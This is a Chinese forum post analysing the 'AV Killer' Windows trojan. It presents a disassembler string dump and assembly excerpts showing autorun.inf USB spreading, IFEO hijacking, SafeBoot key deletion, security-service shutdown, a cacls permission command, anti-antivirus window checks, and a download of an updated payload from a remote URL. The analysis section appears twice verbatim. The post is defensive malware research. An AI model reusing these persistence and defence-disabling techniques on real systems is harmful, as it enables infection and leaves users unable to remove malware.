-
-
[原创]AV Killer病毒分析
-
发表于: 2008-10-17 19:50 5354
-
文件采样为:nhbivui.exe,初步分析为:FSG 2.0 -> bart/xt [Overlay]加壳
脱壳分析之,为delphi编写
文件名称nhbivui.exe是一个隐藏的文件,通过释放auto.exe 和autorun.inf到各个盘符包括U盘,这个系统自动播放功能来达到自动运行的功能。
U感染方式
写autorun.inf,在其中写入
.RIF1:00405B68 0000000A C [AutoRun]
.RIF1:00405B8C 00000014 C shell\\open=打开(&O)
.RIF1:00405BA8 00000014 C shell\\open\\Command=
.RIF1:00405BC4 00000015 C shell\\open\\Default=1
.RIF1:00405BE4 0000001D C shell\\explore=资源管理器(&X)
.RIF1:00405C0C 00000017 C shell\\explore\\Command=
.RIF1:00405ED2 00000012 C 橘謀xFF\xFF腽嬅_^[Y]脥@
.RIF1:00405FAC 00000008 C Comspec
.RIF1:00405FB4 00000006 C \xFF\xFF\xFF\xFF\t
.RIF1:00405FBC 0000000A C /c del \"
.RIF1:00406408 0000005E C 椋裓xFF\xFF豚嬈_^[嬪]肧VW孃嬸嬈鑢豛xFF\xFF嬝嬈鑙赲xFF\xFF嬓嬊嬎枋譢xFF\xFF呟~\tS媆aP鑥鉢xFF\xFF_^[脨U嬱兡鳶塃鼖E*赲xFF\xFF3繳h梔@
.RIF1:00406670 00000041 C ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
.RIF1:00406A3C 0000000D C kernel32.dll
.RIF1:00406A4C 00000017 C RegisterServiceProcess
.RIF1:00406D74 00000012 C SeBackupPrivilege
.RIF1:00406DFC 00000013 C SeRestorePrivilege
.RIF1:00407414 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.RIF1:0040744C 0000000A C Software\\
.RIF1:00407814 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.
.RIF1:0040784C 0000000A C Software\\
.RIF1:00407A28 00000010 C \\Program Files\\
.RIF1:00407AC4 00000024 C \\Program Files\\Common Files\\System\\
.RIF1:00407B74 0000002E C \\Program Files\\Common Files\\Microsoft Shared\\
.RIF1:00409310 00000005 C NTFS
.RIF1:00409320 00000016 C cmd /c echo Y| cacls
.RIF1:00409340 0000001D C autorun.inf /t /g everyone:F
.RIF1:00409F98 00000005 C NTFS
.RIF1:00409FA8 00000016 C cmd /c echo Y| cacls
.RIF1:00409FC8 0000001D C autorun.inf /t /g everyone:F
.RIF1:0040A050 00000005 C .dll
.RIF1:0040A5C8 00000014 C set date=1980-01-23
.RIF1:0040A5DC 00000006 C \xFF\xFF\xFF\xFF\v
.RIF1:0040A5E4 0000000C C date %date%
.RIF1:0040A5F8 00000005 C exit
.RIF1:0040A600 00000006 C \xFF\xFF\xFF\xFFJ
.RIF1:0040A608 0000004B C Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\
.RIF1:0040A654 00000009 C Debugger
.RIF1:0040A698 00000014 C Common Files\\System
.RIF1:0040A6F8 00000006 C KVMON
.RIF1:0040A708 0000001E C Common Files\\Microsoft Shared
00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A788 00000006 C \xFF\xFF\xFF\xFFT
.RIF1:0040A790 00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A7E8 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A7F0 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A84C 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A854 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A8B0 00000006 C radio
.RIF1:0040A8B8 00000005 C Type
.RIF1:0040A8C0 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A91C 0000000D C CheckedValue
.RIF1:0040A92C 00000006 C \xFF\xFF\xFF\xFFQ
.RIF1:0040A934 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A988 0000000A C checkbox2
.RIF1:0040A994 0000004F C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\SuperHidden
.RIF1:0040A9E4 0000002F C SYSTEM\\CurrentControlSet\\Services\\SharedAccess
.RIF1:0040AA14 00000006 C Start
.RIF1:0040AA1C 0000002A C SYSTEM\\CurrentControlSet\\Services\\helpsvc
.RIF1:0040AA48 0000000D C CheckedValue
.RIF1:0040AA58 0000003C C Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
.RIF1:0040AA94 00000010 C ShowSuperHidden
.RIF1:0040AAA4 0000003C C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer
.RIF1:0040AAE0 00000013 C NoDriveTypeAutoRun
.RIF1:0040AAF4 00000029 C SYSTEM\\CurrentControlSet\\Services\\wscsvc
.RIF1:0040AB20 0000002B C SYSTEM\\CurrentControlSet\\Services\\wuauserv
.RIF1:0040AB4C 0000002A C SYSTEM\\CurrentControlSet\\Services\\RSPPSYS
.RIF1:0040AB78 00000025 C SYSTEM\\ControlSet001\\Services\\wscsvc
.RIF1:0040ABA0 00000027 C SYSTEM\\ControlSet001\\Services\\wuauserv // 停止系统服务
.RIF1:0040AD64 00000021 C http://www.webweb.com/TDown1.exe //下载病毒的最新版本(可以作为特征点之一)
.RIF1:0040C178 00000023 C http://www.webweb.com/ReadDown.txt
call __GetDirectroy
lea eax, [ebp+var_8]
mov edx, off_411458
mov edx, [edx]
call sub_403CA0
mov eax, [ebp+var_8]
call sub_403E98
push eax ; lpFileName
call DeleteFileA
mov eax, off_4114F8
cmp dword ptr [eax], 0
jz loc_40AD29
mov eax, off_4114F8
mov eax, [eax]
mov edx, offset s_HttpWww_webwe ; "http://www.webweb.com/TDown1.exe"
call sub_403DE4
jz loc_40AD29
删除旧版本下载新的版本
防止用户使用一些工具进行杀毒,代码如下
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor eax, eax
push ebp
push offset loc_40F5D8
push dword ptr fs:[eax]
mov fs:[eax], esp
push offset WindowName ; " "
push offset s_32770 ; "#32770" ;32770对话框
call FindWindowA //寻找对应的窗口
mov ebx, eax
mov edx, offset s_AvS8749AI ; "\"AV终结者/8749\"木马专杀"
mov eax, ebx
call sub_405E68
相当与FindWindow("#32770"," AV终结者")
其他类似:
loc_40F529: ; "Windows 清理助手"
push offset s_WindowsXA
push offset s_32770 ; "#32770"
call FindWindowA
监视的注册表操作:
loc_40F58C: ; "编辑字符串"
push offset s_RNO
push offset s_32770 ; "#32770"
call FindWindowA ; 这一项是特意针对于注册表操作的
“编辑字符串”如果窗口名为这个的话,那么说明用户是要修改注册表的那个隐藏文件的值,自动关闭。
等等,几乎常见的工具都出现在这个名单中了。
push offset LibFileName ; "kernel32.dll"
call LoadLibraryA
mov hModule, eax
cmp hModule, 0
jz short loc_406A32
push offset s_Registerservi ; "RegisterServiceProcess"
mov eax, hModule
push eax ; hModule
call GetProcAddress
mov dword_4130A8, eax
push 1
push 0
call dword_4130A8
mov eax, hModule
push eax ; hLibModule
call FreeLibrary_0
木马首先加载了kernel32.dll,然后利用GetProcAddress来得到RegisterServiceProcess这个API的地址,木马首先需要把自己注册为系统服务
删除用户的还原,GHOST
mov edx, offset s_SystemControl ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\M"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemContr_0 ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\N"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemCurrent ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
删除注册表键值,使用户进入安全模式出现问题
发现有过主动防御的功能,但是还没有分析好相关代码,大致估计还是劫持比较老套的技术
分析sys后,在贴出来吧
脱壳分析之,为delphi编写
文件名称nhbivui.exe是一个隐藏的文件,通过释放auto.exe 和autorun.inf到各个盘符包括U盘,这个系统自动播放功能来达到自动运行的功能。
U感染方式
写autorun.inf,在其中写入
.RIF1:00405B68 0000000A C [AutoRun]
.RIF1:00405B8C 00000014 C shell\\open=打开(&O)
.RIF1:00405BA8 00000014 C shell\\open\\Command=
.RIF1:00405BC4 00000015 C shell\\open\\Default=1
.RIF1:00405BE4 0000001D C shell\\explore=资源管理器(&X)
.RIF1:00405C0C 00000017 C shell\\explore\\Command=
.RIF1:00405ED2 00000012 C 橘謀xFF\xFF腽嬅_^[Y]脥@
.RIF1:00405FAC 00000008 C Comspec
.RIF1:00405FB4 00000006 C \xFF\xFF\xFF\xFF\t
.RIF1:00405FBC 0000000A C /c del \"
.RIF1:00406408 0000005E C 椋裓xFF\xFF豚嬈_^[嬪]肧VW孃嬸嬈鑢豛xFF\xFF嬝嬈鑙赲xFF\xFF嬓嬊嬎枋譢xFF\xFF呟~\tS媆aP鑥鉢xFF\xFF_^[脨U嬱兡鳶塃鼖E*赲xFF\xFF3繳h梔@
.RIF1:00406670 00000041 C ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
.RIF1:00406A3C 0000000D C kernel32.dll
.RIF1:00406A4C 00000017 C RegisterServiceProcess
.RIF1:00406D74 00000012 C SeBackupPrivilege
.RIF1:00406DFC 00000013 C SeRestorePrivilege
.RIF1:00407414 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.RIF1:0040744C 0000000A C Software\\
.RIF1:00407814 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.
.RIF1:0040784C 0000000A C Software\\
.RIF1:00407A28 00000010 C \\Program Files\\
.RIF1:00407AC4 00000024 C \\Program Files\\Common Files\\System\\
.RIF1:00407B74 0000002E C \\Program Files\\Common Files\\Microsoft Shared\\
.RIF1:00409310 00000005 C NTFS
.RIF1:00409320 00000016 C cmd /c echo Y| cacls
.RIF1:00409340 0000001D C autorun.inf /t /g everyone:F
.RIF1:00409F98 00000005 C NTFS
.RIF1:00409FA8 00000016 C cmd /c echo Y| cacls
.RIF1:00409FC8 0000001D C autorun.inf /t /g everyone:F
.RIF1:0040A050 00000005 C .dll
.RIF1:0040A5C8 00000014 C set date=1980-01-23
.RIF1:0040A5DC 00000006 C \xFF\xFF\xFF\xFF\v
.RIF1:0040A5E4 0000000C C date %date%
.RIF1:0040A5F8 00000005 C exit
.RIF1:0040A600 00000006 C \xFF\xFF\xFF\xFFJ
.RIF1:0040A608 0000004B C Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\
.RIF1:0040A654 00000009 C Debugger
.RIF1:0040A698 00000014 C Common Files\\System
.RIF1:0040A6F8 00000006 C KVMON
.RIF1:0040A708 0000001E C Common Files\\Microsoft Shared
00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A788 00000006 C \xFF\xFF\xFF\xFFT
.RIF1:0040A790 00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A7E8 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A7F0 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A84C 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A854 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A8B0 00000006 C radio
.RIF1:0040A8B8 00000005 C Type
.RIF1:0040A8C0 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A91C 0000000D C CheckedValue
.RIF1:0040A92C 00000006 C \xFF\xFF\xFF\xFFQ
.RIF1:0040A934 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A988 0000000A C checkbox2
.RIF1:0040A994 0000004F C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\SuperHidden
.RIF1:0040A9E4 0000002F C SYSTEM\\CurrentControlSet\\Services\\SharedAccess
.RIF1:0040AA14 00000006 C Start
.RIF1:0040AA1C 0000002A C SYSTEM\\CurrentControlSet\\Services\\helpsvc
.RIF1:0040AA48 0000000D C CheckedValue
.RIF1:0040AA58 0000003C C Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
.RIF1:0040AA94 00000010 C ShowSuperHidden
.RIF1:0040AAA4 0000003C C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer
.RIF1:0040AAE0 00000013 C NoDriveTypeAutoRun
.RIF1:0040AAF4 00000029 C SYSTEM\\CurrentControlSet\\Services\\wscsvc
.RIF1:0040AB20 0000002B C SYSTEM\\CurrentControlSet\\Services\\wuauserv
.RIF1:0040AB4C 0000002A C SYSTEM\\CurrentControlSet\\Services\\RSPPSYS
.RIF1:0040AB78 00000025 C SYSTEM\\ControlSet001\\Services\\wscsvc
.RIF1:0040ABA0 00000027 C SYSTEM\\ControlSet001\\Services\\wuauserv // 停止系统服务
.RIF1:0040AD64 00000021 C http://www.webweb.com/TDown1.exe //下载病毒的最新版本(可以作为特征点之一)
.RIF1:0040C178 00000023 C http://www.webweb.com/ReadDown.txt
call __GetDirectroy
lea eax, [ebp+var_8]
mov edx, off_411458
mov edx, [edx]
call sub_403CA0
mov eax, [ebp+var_8]
call sub_403E98
push eax ; lpFileName
call DeleteFileA
mov eax, off_4114F8
cmp dword ptr [eax], 0
jz loc_40AD29
mov eax, off_4114F8
mov eax, [eax]
mov edx, offset s_HttpWww_webwe ; "http://www.webweb.com/TDown1.exe"
call sub_403DE4
jz loc_40AD29
删除旧版本下载新的版本
防止用户使用一些工具进行杀毒,代码如下
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor eax, eax
push ebp
push offset loc_40F5D8
push dword ptr fs:[eax]
mov fs:[eax], esp
push offset WindowName ; " "
push offset s_32770 ; "#32770" ;32770对话框
call FindWindowA //寻找对应的窗口
mov ebx, eax
mov edx, offset s_AvS8749AI ; "\"AV终结者/8749\"木马专杀"
mov eax, ebx
call sub_405E68
相当与FindWindow("#32770"," AV终结者")
其他类似:
loc_40F529: ; "Windows 清理助手"
push offset s_WindowsXA
push offset s_32770 ; "#32770"
call FindWindowA
监视的注册表操作:
loc_40F58C: ; "编辑字符串"
push offset s_RNO
push offset s_32770 ; "#32770"
call FindWindowA ; 这一项是特意针对于注册表操作的
“编辑字符串”如果窗口名为这个的话,那么说明用户是要修改注册表的那个隐藏文件的值,自动关闭。
等等,几乎常见的工具都出现在这个名单中了。
push offset LibFileName ; "kernel32.dll"
call LoadLibraryA
mov hModule, eax
cmp hModule, 0
jz short loc_406A32
push offset s_Registerservi ; "RegisterServiceProcess"
mov eax, hModule
push eax ; hModule
call GetProcAddress
mov dword_4130A8, eax
push 1
push 0
call dword_4130A8
mov eax, hModule
push eax ; hLibModule
call FreeLibrary_0
木马首先加载了kernel32.dll,然后利用GetProcAddress来得到RegisterServiceProcess这个API的地址,木马首先需要把自己注册为系统服务
删除用户的还原,GHOST
mov edx, offset s_SystemControl ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\M"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemContr_0 ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\N"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemCurrent ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
mov edx, offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
删除注册表键值,使用户进入安全模式出现问题
发现有过主动防御的功能,但是还没有分析好相关代码,大致估计还是劫持比较老套的技术
分析sys后,在贴出来吧
赞赏
看原图
赞赏
雪币:
留言: